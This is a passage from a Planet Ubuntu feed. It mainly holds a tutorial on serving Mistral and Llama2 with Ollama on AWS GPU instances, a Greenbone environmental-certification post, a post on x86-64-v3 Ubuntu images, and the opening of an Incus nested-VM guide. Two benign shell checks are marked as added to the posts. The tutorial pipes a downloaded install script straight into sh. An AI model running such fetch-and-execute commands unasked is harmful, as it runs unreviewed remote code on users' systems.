If you are interested in other bundles not listed in the notes, use the link <a href="https://www.humblebundle.com/?partner=PUP">https://www.humblebundle.com/?partner=PUP</a> and you will also be supporting us.</p>
<h3 id="atribuição-e-licenças">Attribution and licences</h3>
<p>This episode was produced by Diogo Constantino, Miguel and Tiago Carrondo and edited by <a href="https://senhorpodcast.pt/">Senhor Podcast</a>.
The website is produced by Tiago Carrondo and the <a href="https://gitlab.com/podcastubuntuportugal/website">open source code</a> is licensed under the terms of the <a href="https://gitlab.com/podcastubuntuportugal/website/main/LICENSE">MIT Licence</a>.
The theme music is: “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)”, by Alpha Hydrae, and is licensed under the terms of the <a href="https://creativecommons.org/publicdomain/zero/1.0/">CC0 1.0 Universal License</a>.
This episode and the image used are licensed under the terms of the licence: <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/">Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)</a>, <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode">the full text of which can be read here</a>. We are open to licensing to allow other types of use; <a href="https://podcastubuntuportugal.org/contactos">contact us</a> for validation and authorisation.</p>Ubuntu developershttp://planet.ubuntu.com/Ubuntu Blog: Generative AI with Ubuntu on AWS. Part II: Text generationhttps://ubuntu.com//blog/genai-on-ubuntu-on-aws-text-generation2024-03-27T15:09:40+00:00<p><em>In our </em><a href="https://ubuntu.com/blog/genai-on-ubuntu-on-aws-image-generation"><em>previous post</em></a><em>, we discussed how to generate images using Stable Diffusion on AWS. In this post, we will guide you through running LLMs for text generation in your own environment with a GPU-based instance in simple steps, empowering you to create your own solutions.</em> </p>
<p>Text generation, a trending focus in generative AI, facilitates a broad spectrum of language tasks beyond simple question answering. These tasks include content extraction, summary generation, sentiment analysis, text enhancement (including spelling and grammar correction), code generation, and the creation of intelligent applications like chatbots and assistants.</p>
<p>In this tutorial, we will demonstrate how to deploy two prominent large language models (LLM) on a GPU-based EC2 instance on AWS (G4dn) using <a href="https://ollama.com/" rel="noreferrer noopener" target="_blank">Ollama</a>, an open source tool for downloading, managing, and serving LLM models. Before getting started, ensure you have completed our technical guide for <a href="https://canonical-aws.readthedocs-hosted.com/en/latest/aws-how-to/instances/install-nvidia-drivers/" rel="noreferrer noopener" target="_blank">installing NVIDIA drivers with CUDA on a G4DN instance</a>.</p>
<p>We will utilize <a href="https://llama.meta.com/llama2" rel="noreferrer noopener" target="_blank">Llama2</a> and <a href="https://mistral.ai/" rel="noreferrer noopener" target="_blank">Mistral</a>, both strong contenders in the LLM space with open source licenses suitable for this demo.</p>
<p>While we won’t explore the technical details of these models, it is worth noting that Mistral <a href="https://mistral.ai/news/announcing-mistral-7b/" rel="noreferrer noopener" target="_blank">has shown impressive results</a> despite its relatively small size (7 billion parameters fitting into an 8GB VRAM GPU). Conversely, Llama2 provides a range of models for various tasks, all available under open source licenses, making it well-suited for this tutorial. </p>
<p>To experiment with question-answer models similar to ChatGPT, we will utilize the fine-tuned versions optimized for chat or instruction (Mistral-instruct and Llama2-chat), as the base models are primarily designed for text completion.</p>
<p>Let’s get started!</p>
<h2 class="wp-block-heading">Step 1: Installing Ollama</h2>
<p>To begin, open an SSH session to your G4DN server and verify the presence of NVIDIA drivers and CUDA by running:</p>
<pre class="wp-block-code"><code>nvidia-smi</code></pre>
<p>Keep in mind that you need to have the SSH port open, the key-pair created or assigned to the machine during creation, the external IP of the machine, and software like <code>ssh</code> for Linux or PuTTY for Windows to connect to the server.</p>
<p>If the drivers are not installed, refer to our technical guide on <a href="https://canonical-aws.readthedocs-hosted.com/en/latest/aws-how-to/instances/install-nvidia-drivers/" rel="noreferrer noopener" target="_blank">installing NVIDIA drivers with CUDA on a G4DN instance</a>.</p>
<p>Once you have confirmed the GPU drivers and CUDA are set up, proceed to install Ollama. You can opt for a quick installation using their binary, or choose to clone the repository for a <a href="https://github.com/ollama/ollama/blob/main/docs/linux.md" rel="noreferrer noopener" target="_blank">manual installation</a>.</p>
<p>To install Ollama quickly, run the following command:</p>
<pre class="wp-block-code"><code>curl -fsSL https://ollama.com/install.sh | sh</code></pre>
<h2 class="wp-block-heading">Step 2: Running LLMs on Ollama</h2>
<p>Let’s start with Mistral models and view the results by running:</p>
<pre class="wp-block-code"><code>ollama run mistral</code></pre>
<p>This instruction will download the Mistral model (4.1GB) and serve it, providing a prompt for immediate interaction with the model.</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/fl-CU72xnqdUmIlstlbC16YA561D2EZfK714dc4MvntLxCtX_EacdmKgav4K4JitGJQ7LMXY_96A2r1eytxylAQb6A_imPxLxGuQ4x0TKzIhIc_wp2loejq6ZtIDw0POP0mnCvipQn2QrnwFN3Ke50s" width="720" />
</noscript>
</div>
</figure>
<p>Not a bad response for a prompt written in Spanish! Now let’s experiment with a prompt to write code:</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/qsCzgWB_Oa5jI9aiQeSQw3Y3AM6vwtp-pH5ZPGUHuLlDutELXtz10q2CVcUD5UfUQFGanO1dVesVpPBVNyWTZoA1mtGrd4Bc5S1D5KGIx40niOpZBTd1b6dYCWdVSWc2jsoBwKcpdzK-olGLNV8FnUw" width="720" />
</noscript>
</div>
</figure>
<p>Impressive indeed. The response is not only generated rapidly, but the code also runs flawlessly, with basic error handling and explanations. (Here’s a pro tip: consider asking for code comments, docstrings, and even test functions to be incorporated into the code). </p>
<p>Exit with the <code>/bye</code> command.</p>
<p>Now, let’s enter the same prompt with Llama2.</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/khde_aa7oD1YCNZCqHfr3BImnx9DljC6LRQWYsY-h2QQqB1X-biwirAHc5UXKqvBbGj6IkMVGxIgJBgkg2G2zNuAmGFy6yiqJktNFV3noMky-lDdpV9fK0Hi3rKVPuCEU-2EU5JO_aogYR4rm5atr_U" width="720" />
</noscript>
</div>
</figure>
<p>We can see that there are immediate, notable differences. This may be due to the training data it has encountered, as it defaulted to a playful and informal chat-style response. </p>
<p>Let’s try Llama2 using the same code prompt from above:</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/EJbcqAPT0KnCLdhkEHAYyV-GoQF9tFq7HD6oUW9bL1jdXRhK6ePMpBzsya-riGc-oUuU6YJnju8p6rENuvAvWwdFhXW1DHguSIepqoUyhEs53_J6ErA1MYZQ4chicB4NQ4yYcbVTzK7xIe2YtLlklxE" width="720" />
</noscript>
</div>
</figure>
<p>The results of this prompt are quite interesting. Following four separate tests, it was clear that the generated responses had not only broken code but also inconsistencies within the responses themselves. It appears that writing code is not one of the out-of-the-box capabilities of Llama2 in this variant (7b parameters, although there are also versions specialized in code like Code-Llama2), but results may vary.</p>
<p>Let’s run a final test with <a href="https://huggingface.co/blog/codellama" rel="noreferrer noopener" target="_blank">Code-Llama</a>, a Llama model fine-tuned to create and explain code:</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/Pb-OFsqzSSwjNvwjRvunNOOVom24QlKI0Qj7AUbI99DuDAkseozB907EB6Q7UCwBJKjq-Qkj7a470lG6d30cKCvJYjJsnKvurJ0HxhJLcT2C77Vu3ceqW9-FBmqgBiTa9ndMrxHh0sjlw3c4SoenBIw" width="720" />
</noscript>
</div>
</figure>
<p>We will use the same prompt from above to write the code:</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/rjAusR9z9VY8UZ5qHbJpaGVBMKgMvf7uLlunmtarEJRUbyL7ZyHnx_EUyRzSYJKeLrD8wPqz0VURJY28lyusU3Q9MBZFrxWUBWYa6TUQXw-Qg0uqSz2x8vEv52RDsykWMbr5WC7VNbiBZM_0OGiRO-o" width="720" />
</noscript>
</div>
</figure>
<p>This time, the response is improved, with the code functioning properly and a satisfactory explanation provided.</p>
<p>You now have the option to either continue exploring directly through this interface or start developing apps using the <a href="https://github.com/ollama/ollama/blob/main/docs/api.md" rel="noreferrer noopener" target="_blank">API</a>.</p>
<h2 class="wp-block-heading">Final test: A chat-like web interface</h2>
<p>We now have something ready for immediate use. However, for some added fun, let’s install a chat-like web interface to mimic the experience of ChatGPT.</p>
<p>For this test, we are going to use ollama-ui (<a href="https://github.com/ollama-ui/ollama-ui" rel="noreferrer noopener" target="_blank">https://github.com/ollama-ui/ollama-ui</a>). </p>
<p>⚠︎ <em>Please note that this project is no longer being maintained and users should transition to <a href="https://github.com/open-webui/open-webui" rel="noreferrer noopener" target="_blank">Open WebUI</a>, but for the sake of simplicity, we are going to still use the Ollama-ui front-end.</em></p>
<p>In your terminal window, clone the ollama-ui repository by entering the following command:</p>
<pre class="wp-block-code"><code>git clone https://github.com/ollama-ui/ollama-ui</code></pre>
<p>Here’s a cool trick: when you run Ollama, it creates an API endpoint on port 11434. Ollama-ui, however, will run and be accessible on port 8000, so we’ll need to ensure both ports are securely accessible from our machine.</p>
<p>Since we are currently running as a development service (without the security features and performance of a production web server), we will establish an SSH tunnel for both ports. This setup will enable us to access these ports exclusively from our local computer with encrypted communication (SSL).</p>
<p>To create the tunnel for both the web-ui and the model’s API, close your current SSH session and open a new one with the following command:</p>
<pre class="wp-block-code"><code>ssh -L 8000:localhost:8000 -L 11434:127.0.0.1:11434 -i myKeyPair.pem ubuntu@<Machine_IP></code></pre>
<p>Once the tunnel is set up, navigate to the ollama-ui directory in a new terminal and run the following command:</p>
<pre class="wp-block-code"><code>cd ollama-ui<br />make</code></pre>
<p>Next, open your local browser and go to 127.0.0.1:8000 to enjoy the chat web interface!</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/uLI_zjL4X2QaaMudOr0_orYlhCqA3zgIGqrvJ5v4QDeiKKy2Yp6TjMDRB189jPNwLJjWBtLUcYWLgdlSiEpvwNkJr9jxmF0sfTpf4Y_nhx6QsNcQPmgs0resb2PtE6kN591MkQ1dN-1O2cKLyO9NLnQ" width="720" />
</noscript>
</div>
</figure>
<p>While the interface is simple, it enables dynamic model switching, supports multiple chat sessions, and facilitates interaction beyond reliance on the terminal (aside from tunneling). This offers an alternative method for testing the models and your prompts.</p>
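<p>The tunnel’s encryption comes from the SSH session itself, and it only keeps the two services private if they listen on the instance’s loopback interface and the security group exposes nothing beyond SSH. The check below is an added example, not part of the original post or of Ollama: it parses <code>ss -H -tln</code> output and reports any listener on ports 8000 or 11434 that is bound to a non-loopback address. The function name and the sample input are constructed for illustration.</p>

```shell
#!/bin/sh
# Added example: flag tunnel-only services that are reachable from the network.

# Constructed sample of `ss -H -tln` output (not captured from a real host).
# Here the API is loopback-only, but the web UI is bound to every interface.
SAMPLE_SS='LISTEN 0 4096 127.0.0.1:11434 0.0.0.0:*
LISTEN 0 5 0.0.0.0:8000 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 128 [::]:22 [::]:*
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*'

# exposed_listeners PORT...
#   stdin : output of `ss -H -tln` (TCP listeners, numeric, no header)
#   stdout: one "address:port" line per listener on a given port whose
#           local address is NOT loopback (wildcard or a routable address)
exposed_listeners() {
    awk -v ports="$*" '
        BEGIN {
            n = split(ports, p, " ")
            for (i = 1; i <= n; i++) want[p[i]] = 1
        }
        $1 == "LISTEN" {
            # Field 4 is "local-address:port"; the port follows the last colon.
            port = $4; sub(/.*:/, "", port)
            addr = $4; sub(/:[^:]*$/, "", addr)
            sub(/%.*$/, "", addr)          # drop an interface suffix such as %lo
            if (!(port in want)) next
            # 127.0.0.0/8, ::1 and IPv4-mapped loopback are only reachable locally.
            if (addr ~ /^127\./ || addr == "[::1]" || addr ~ /^\[::ffff:127\./) next
            print addr ":" port
        }'
}

# Demonstration on the constructed sample; prints 0.0.0.0:8000.
printf '%s\n' "$SAMPLE_SS" | exposed_listeners 8000 11434

# On the instance itself, after starting Ollama and ollama-ui:
#   ss -H -tln | exposed_listeners 8000 11434
# No output means both services are reachable only through the SSH tunnel.
```

<p>Any line this prints is a service that becomes reachable from outside as soon as the security group allows that port, so keep the inbound rules limited to SSH.</p>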
<h2 class="wp-block-heading">Final thoughts</h2>
<p>Thanks to Ollama and how simple it is to install the NVIDIA drivers on a GPU-based instance, we got a very straightforward process for running LLMs for text generation in your own environment. Additionally, Ollama facilitates the creation of custom model versions and fine-tuning, which is invaluable for developing and testing LLM-based solutions.</p>
<p>When selecting the appropriate model for your specific use case, it is crucial to evaluate their capabilities based on architectures and the data they have been trained on. Be sure to explore fine-tuned variants such as Llama2 for code, as well as specialized versions tailored for generating Python code.</p>
<p>Lastly, for those aiming to develop production-ready applications, remember to review the model license and plan for scalability, as a single GPU server may not suffice for multiple concurrent users. You may want to explore <a href="https://aws.amazon.com/bedrock/" rel="noreferrer noopener" target="_blank">Amazon Bedrock</a>, which offers easy access to various versions of these models through a simple API call or <a href="https://ubuntu.com/ai/mlops" rel="noreferrer noopener" target="_blank">Canonical MLOps</a>, an end-to-end solution for training and running your own ML models.</p>
<h2 class="wp-block-heading">Quick note regarding the model size</h2>
<p>The size of the model significantly impacts the production of better results. A larger model is more capable of reproducing better content (since it has a greater capacity to “learn”). Additionally, larger models offer a larger attention window (for “understanding” the context of the question), and allow more tokens as input (your instructions) and output (the response).</p>
<p>As an example, Llama2 offers three main model sizes regarding the parameter number: 7, 13, or 70 billion parameters. The first model requires a GPU with a minimum of 8GB of GPU RAM, whereas the second requires a minimum of 16GB of VRAM.</p>
<p>Let me share a final example:</p>
<p>I will request the 7B parameters version of Llama2 to proofread an incorrect version of this simple Spanish phrase, “¿Hola, cómo estás?”, which translates to “Hi, how are you?” in English. </p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/_ZKYLr9y74wKnd7ZXOIHEL_zOkWwzXkcVT6EIl_Dk7HCLlnATlU4HiEkRCfK8mOFcA-vtJzN1fEsXSqHgw2K9yXGau7S0DyMXonaNKQb5JldqLletBvoPjBpdB884cipxBer-QSm1kcsdq7cVGyV4DQ" width="720" />
</noscript>
</div>
</figure>
<p>I conducted numerous tests, all yielding incorrect results like the one displayed in the screenshot (where “óle” is not a valid word, and it erroneously suggests it means “hello”).</p>
<p>Now, let’s test the same example with Llama2 with 13 billion parameters:</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/efiibK2R508IFhdRykchQzoN2C5ysEdtQsf28yovi_cZNqdF1MXVHzOdJWx2DEAwsbv423AolmzmtqsjaerdE4DlWbnIqUzfdUts9wPM84-34UGni_7CZFtCKKq2QWpCNJjQn5i44qbn8J8TwTO3v6c" width="720" />
</noscript>
</div>
</figure>
<p>While it failed to recognize that I intended to write “hola,” this outcome is significantly better as it added accents, question marks and detected that “ola” wasn’t the right word to use (if you are curious, it means “wave”).</p>Ubuntu developershttp://planet.ubuntu.com/Greenbone All in Green: ISO 14001 Certificationhttps://www.greenbone.net/?p=405432024-03-27T14:55:02+00:00<div class="flex flex-grow flex-col max-w-full">
<div class="min-h-[20px] text-message flex flex-col items-start gap-3 whitespace-pre-wrap break-words [.text-message+&]:mt-5 overflow-x-auto">
<div class="markdown prose w-full break-words dark:prose-invert light">
<p>It doesn’t get any greener? Not at all! We have just completed certification of our environmental management system in accordance with ISO 14001. And we have realised: There is always room for getting “greener” – you just have to be committed and willing to drive this commitment forward in measurable progress.</p>
<p><img alt="Greenbone passes ISO 14001 Certification." class="alignnone wp-image-40548 size-full" height="450" src="https://www.greenbone.net/wp-content/uploads/Iso-14001-Blog.jpg" width="1050" /></p>
<p>The international standard ISO 14001 defines requirements that companies can use to achieve environmental goals and fulfil legal obligations. Because the environmental niche is different for every organisation, the standard does not specify absolute values and targets, but it does emphasise integration into quality management, C-level responsibility for environmental management and the elimination of ambiguity regarding environmental targets.</p>
<p><strong>Targets, objectives, key figures: A dry framework for green growth</strong></p>
<p>The current German version of the standard, DIN EN ISO 14001:2015, places particular emphasis on “environmental performance improvement” and its measurement using appropriate indicators. The ecological objectives thus relate to the upstream and downstream environmental impact of products and services as well as the consideration of opportunities and risks in day-to-day business. The whole process is to be set up as part of a continuous improvement process (CIP) so that the effects of each new measure can be monitored and adapted accordingly. With this certification, we are proud to be able to announce another important step towards a company that is not only “green” on the outside, in the company logo, but also on the inside.</p>
<p>Back in autumn 2023, when the “Environmental Management System” was introduced, it was clear to us: we may not be able to save the world, but every step in this direction is important to us! So, step by step, we started by collecting all aspects that could have an impact on the environment. After ranking the factors and prioritising them, eleven areas emerged in which Greenbone can become ecologically effective and active: Starting with electricity consumption, cooling servers, heating offices and dispatching goods, through to waste separation and the energy efficiency of our appliances.</p>
<p><strong>And again and again: measure…</strong></p>
<p>As a company that emphasises the realisation and clear presentation of objectives, Greenbone is already certified according to <a href="https://www.greenbone.net/en/blog/iso-certification/" rel="noopener" target="_blank">ISO 9001:2015 (quality management) and ISO 27001:2017 (information security)</a> as well as within the framework of <a href="https://www.greenbone.net/en/blog/tisax-certification/" rel="noopener" target="_blank">TISAX for the Information Security Management System (ISMS)</a>. For ISO 14001, we have concretised our objectives in clearly defined key performance indicators (KPIs) in order to make them available for subsequent measurements. This allows us to readjust existing measures and introduce further improvements. What initially sounds dry is already bearing its first “green” fruits:</p>
<ul>
<li>Our electricity has been supplied entirely from renewable energy sources since the company was founded. Total consumption – including clients and servers – is set to be reduced by a further 3% in the near future.</li>
<li>Whenever we purchase new equipment, we pay particular attention to sustainability and energy efficiency.</li>
<li>Since 2020, we have only used electric cars as company vehicles.</li>
<li>We have switched to digital payroll accounting.</li>
<li>The server room is regularly checked for potential savings.</li>
<li>We also prioritise environmental protection on a small scale: Waste is only collected centrally and packaging material is reused as a matter of principle.</li>
</ul>
<p>To make our ecological progress even more sustainable, we keep up to date with regular internal training courses on energy efficiency. In this way, we are helping to make the world even “greener” outside of Greenbone.</p>
</div>
</div>
</div>Andreas Berglerhttps://www.greenbone.net/en/Ubuntu Blog: Profile workloads on x86-64-v3 to enable future performance gainshttps://ubuntu.com//blog/profile-workloads-on-x86-64-v3-to-enable-future-performance-gains2024-03-27T14:04:26+00:00<h1 class="wp-block-heading">Ubuntu 23.10 experimental image with x86-64-v3 instruction set now available on Azure</h1>
<p>Canonical is enabling enterprises to evaluate the performance of their most critical workloads in an experimental Ubuntu image on Azure compiled with x86-64-v3, which is a microarchitecture level that has the potential for performance gains. Developers can use this image to characterise workloads, which can help inform planning for a transition to x86-64-v3 and provide valuable input to the community working to make widespread adoption of x86-64-v3 a reality. </p>
<p>The x86-64-v3 instruction set enables hardware features that have been added by chip vendors since the original instruction set architecture (ISA) commonly known as x86-64-v1, x86-64, or amd64. Canonical Staff Engineer <a href="https://ubuntu.com/blog/optimising-ubuntu-performance-on-amd64-architecture">Michael Hudson-Doyle recently wrote about</a> the history of the x86-64/amd64 instruction sets, what these v1 and v3 microarchitecture levels represent, and how Canonical is evaluating their performance. While fully backwards compatible, later versions of these feature groups are not available on all hardware, so when deciding on an ISA image you must choose to maximise the supported hardware or to get access to more recent hardware capabilities. Canonical plans to continue supporting x86-64-v1 as there is a significant amount of legacy hardware deployed in the field. However, we also want to enable users to take advantage of newer x86-64-v3 hardware features that provide the opportunity for performance improvements the industry isn’t yet capitalising on. </p>
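<p>To see which level a given machine or VM size reaches before choosing an image, the CPU flags Linux reports can be compared against each level’s required features. This is an added example, not code from the post or from Canonical; the flag lists use the names shown in <code>/proc/cpuinfo</code> (for instance <code>pni</code> for SSE3 and <code>abm</code> for LZCNT) and are this example’s assumption, and both sample <code>flags</code> lines are constructed.</p>

```shell
#!/bin/sh
# Added example: report the highest x86-64 microarchitecture level (0-3)
# a CPU supports, from text in /proc/cpuinfo format.

# Flags each level adds, as named in /proc/cpuinfo (assumed lists, see lead-in).
V1="lm cmov cx8 fpu fxsr mmx syscall sse sse2"
V2="cx16 lahf_lm popcnt pni sse4_1 sse4_2 ssse3"
V3="avx avx2 bmi1 bmi2 f16c fma abm movbe xsave"

# Constructed sample: a CPU with every v3 feature.
SAMPLE_V3='flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology cpuid pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti fsgsbase bmi1 avx2 smep bmi2 erms invpcid xsaveopt'

# Constructed sample: a CPU that has AVX but lacks AVX2, BMI, FMA and others.
SAMPLE_V2='flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx rdtscp lm pni pclmulqdq ssse3 cx16 sse4_1 sse4_2 popcnt aes xsave avx lahf_lm'

# Print the flag list of the first CPU found on stdin (empty if none).
cpu_flags() {
    awk -F: '/^flags/ { print $2; exit }'
}

# missing_flags "PRESENT" "REQUIRED": print the required flags not present.
missing_flags() {
    missing=""
    for need in $2; do
        case " $1 " in
            *" $need "*) ;;                              # whole-word match
            *) missing="${missing:+$missing }$need" ;;
        esac
    done
    printf '%s\n' "$missing"
}

# Read cpuinfo text on stdin and print the highest complete level.
# Levels are cumulative, so stop at the first one with a missing flag.
x86_64_level() {
    flags=$(cpu_flags)
    level=0
    for req in "$V1" "$V2" "$V3"; do
        [ -z "$(missing_flags "$flags" "$req")" ] || break
        level=$((level + 1))
    done
    echo "$level"
}

# Read cpuinfo text on stdin and list what is still needed for v3 itself.
missing_for_v3() {
    missing_flags "$(cpu_flags)" "$V3"
}

# Demonstration on the constructed samples.
printf 'sample A: level %s\n' "$(printf '%s\n' "$SAMPLE_V3" | x86_64_level)"
printf 'sample B: level %s, missing for v3: %s\n' \
    "$(printf '%s\n' "$SAMPLE_V2" | x86_64_level)" \
    "$(printf '%s\n' "$SAMPLE_V2" | missing_for_v3)"

# On a real host:
#   x86_64_level < /proc/cpuinfo
```

<p>A result below 3 means a v3-compiled image should not be booted on that hardware; inside a VM the answer also depends on which CPU features the hypervisor passes through.</p>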
<h2 class="wp-block-heading">Untapped performance and power benefits</h2>
<p>Intel and Canonical partner closely to ensure that Ubuntu takes full advantage of the advanced hardware features Intel silicon offers, and the Ubuntu image on Azure is an interim step towards giving the industry access to the capabilities of x86-64-v3 and understanding the benefits that it offers. Intel has made x86-64-v3 available since Intel Haswell was first announced a decade ago. Support in their low power processor family is more recent, arriving in the Gracemont microarchitecture which was first in the 12th generation of Intel Core processors. Similarly, AMD has had examples since 2015, and emulators such as QEMU have supported x86-64-v3 since 2022. Yet, with this broad base of hardware availability, distro support of the features in the x86-64-v3 microarchitecture level is not widespread. In the spirit of enabling Ubuntu everywhere and ensuring that users can benefit from the unique features on different hardware families, Canonical feels strongly about enabling a transition to x86-64-v3 while remaining committed to our many users on hardware that doesn’t support v3. x86-64-v3 is available in a significant amount of hardware, and provides the opportunity for performance improvements which are currently being left on the table. This is why we believe that v3 is the next logical microarchitecture level to offer in Ubuntu, and Michael’s blog post explains in greater detail why v3 should be chosen instead of v2 or v4.</p>
<h2 class="wp-block-heading">Not just a porting exercise</h2>
<p>The challenge with enabling the transition to v3 is that while we expect a broad range of performance improvements depending on the workload, the results are much more nuanced. From Canonical’s early benchmarking we see that certain workloads see significant benefit from the adoption of x86-64-v3; however there are outliers that regress and need further analysis.</p>
<p>Canonical continues to do benchmarking, with plans to evaluate different compilers, compiler parameters, and configurations of hostOS and guestOS. In certain cases, such as the Glibc Log2 benchmark, we have reproducibly seen up to a 60% improvement. On the other hand, we also see other benchmarks that regress significantly. When digging in, we found unexpected behaviour in the compiled code. For example, in one of the benchmarks we verified an excessive number of moves between registers, leading to much worse performance due to the increased latency. In another situation, we noticed a large code size increase, as enabling x86-64-v3 on optimised SSE code caused the compiler to expand it into 17x more instructions, due to a possible bug during the translation to VEX encoding. With community efforts, these outliers could be resolved. However, they will require interdisciplinary collaboration to do so. This also underscores the necessity of benchmarking different types of workloads, so that we can understand their specific performance and bottlenecks. That’s why we believe it’s important to enable workloads to run on Azure, so that a broader community can give feedback and enable further optimisation.</p>
<h2 class="wp-block-heading">Try Ubuntu 23.10 with x86-64-v3 on Azure today</h2>
<p>The community now has access to resources on Azure to easily evaluate the performance of x86-64-v3 for their workloads, so that they can understand the benefits of migrating and can identify where improvements are still required. What is being shared today is experimental and for evaluation and benchmarking purposes only, which means that it won’t receive security updates or other maintenance updates you would expect for an image you could use in production. When x86-64-v3 is introduced for production workloads there will be a benefit to being able to run both v3 and v1 depending on the workload and hardware available. As is usually the case, the answer to the question of whether to run on a v3 image or a v1 image is ‘it depends’. This image provides the tools to answer that cost, power, and performance optimisation problem. In addition to the availability of the cloud image on Azure, we’ve also <a href="https://discourse.ubuntu.com/t/trying-out-ubuntu-23-04-on-x86-64-v3-rebuild-for-yourself/40963">previously posted</a> on the availability of Ubuntu 23.04 rebuilt to target the x86-64-v3 microarchitecture level, and made available installer images from that archive. These are additional tools that the community can use to benchmark, when cloud environments can’t be targeted.</p>
<p>In order to access the image on Azure and use it, you can follow the instructions in <a href="https://discourse.ubuntu.com/t/trying-out-ubuntu-23-10-on-x86-64-v3-rebuild-on-azure/43668">our discourse post</a>. Please be sure to leave your feedback there, or <a href="https://ubuntu.com/contact-us">contact us directly to discuss your use case</a>.</p>
<h2 class="wp-block-heading">Further reading</h2>
<ul>
<li><a href="https://ubuntu.com/blog/optimising-ubuntu-performance-on-amd64-architecture">Optimising Ubuntu performance on amd64 architecture</a></li>
<li><a href="https://discourse.ubuntu.com/t/trying-out-ubuntu-23-04-on-x86-64-v3-rebuild-for-yourself/40963">Trying out Ubuntu 23.04 on x86-64-v3 rebuild for yourself</a></li>
</ul>Ubuntu developershttp://planet.ubuntu.com/Simos Xenitellis: How to run an Incus VM inside an Incus VM (nested virtualization)https://blog.simos.info/?p=467372024-03-27T13:40:48+00:00<p><a href="https://linuxcontainers.org/incus/">Incus</a> is a manager for virtual machines (VM) and system containers. There is also <a href="https://discuss.linuxcontainers.org/">an Incus support forum</a>.</p>
<p>A <strong>virtual machine</strong> (VM) is an instance of an operating system that runs on a computer, along with the main operating system. A virtual machine uses hardware virtualization features for the separation from the main operating system. With virtual machines, the full operating system boots up in them. </p>
<p>A <strong>system container</strong> is an instance of an operating system that also runs on a computer, along with the main operating system. A system container, instead, uses security primitives of the Linux kernel for the separation from the main operating system. You can think of system containers as <em>software virtual machines</em>. System containers reuse the running Linux kernel of the host, therefore you can only have Linux system containers, <a href="https://images.linuxcontainers.org/">any Linux distribution</a>. </p>
<p>In this post we see how to create a VM with Incus, install Incus into that VM, and then create a VM through the <em><strong>inner Incus installation</strong></em>. This is also called <strong><em>nested virtualization</em></strong>. Incus works fine with nested virtualization. Any pitfalls arise from the settings of the host (BIOS/UEFI settings, host Linux kernel, etc). We’ll see these together, step by step.</p>
<h2 class="simpletoc-title">Table of Contents</h2>
<ul class="simpletoc-list">
<li><a href="https://blog.simos.info/category/planet-ubuntu/feed/?mrss=off#configuring-your-hardware-for-virtualization">Configuring your hardware for virtualization</a>
</li>
<li><a href="https://blog.simos.info/category/planet-ubuntu/feed/?mrss=off#testing-your-host-for-virtualization">Testing your host for virtualization</a>
</li>
<li><a href="https://blog.simos.info/category/planet-ubuntu/feed/?mrss=off#testing-your-host-for-nested-virtualization">Testing your host for nested virtualization</a>
</li>
<li><a href="https://blog.simos.info/category/planet-ubuntu/feed/?mrss=off#launching-the-outer-incus-vm">Launching the outer Incus VM</a>
</li>
<li><a href="https://blog.simos.info/category/planet-ubuntu/feed/?mrss=off#conclusion">Conclusion</a>
</li></ul>
<h2 class="wp-block-heading" id="configuring-your-hardware-for-virtualization">Configuring your hardware for virtualization</h2>
<p>You need to enter the BIOS/UEFI settings and enable the option for <strong>VT-x</strong> (for Intel CPUs) or <strong>AMD-V</strong> (for AMD CPUs) virtualization. If you are unsure, you can just follow the instructions in the next step, which will complain if you have not enabled the appropriate BIOS/UEFI settings.</p>
<p>As a side note, there is another setting, Intel VT-d (for Intel CPUs) or AMD-Vi (for AMD CPUs), that allows you to move a supported hardware device (like a GPU, if you have more than one) into the VM. It is not essential for what we are testing, but keep it in mind if you get deep into virtualization.</p>
<p>There are also some optional settings: AMD Nested Page tables (NPT) (for AMD) and Rapid Virtualization Indexing (RVI)/Intel Extended Page Tables (EPT) for Intel. These help with performance. </p>
<h2 class="wp-block-heading" id="testing-your-host-for-virtualization">Testing your host for virtualization</h2>
